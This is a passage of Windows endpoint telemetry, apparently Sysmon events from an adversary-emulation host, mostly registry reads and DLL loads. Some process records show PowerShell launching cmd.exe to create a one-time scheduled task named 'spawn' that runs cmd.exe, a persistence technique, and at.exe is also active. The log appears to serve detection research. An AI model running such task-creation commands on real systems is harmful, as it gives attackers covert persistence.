131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msv1_0.dll", - "image_path": "C:\\Windows\\System32\\msv1_0.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "NtlmShared.dll", - "image_path": "C:\\Windows\\System32\\NtlmShared.dll", - "pid": 5964, - "process_name": "at.exe", - "process_path": "C:\\Windows\\System32\\at.exe", - "timestamp": 131883573803860000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001077E05601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6764, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573804120000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804009984, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "event_type": "file", - "file_name": "AT.EXE-E3131BD4.pf", - "file_path": "C:\\Windows\\Prefetch\\AT.EXE-E3131BD4.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 6764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573804170000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001019E65601}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1776, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573804750000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804640000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804640000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804640000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804640000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573804790000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "command_line": "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6308, - "ppid": 1776, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "subtype": "create", - "timestamp": 131883573804840000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}", - "unique_ppid": "{42FC7E13-CC04-5C05-0000-001048EB5601}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573804950016, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573805110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 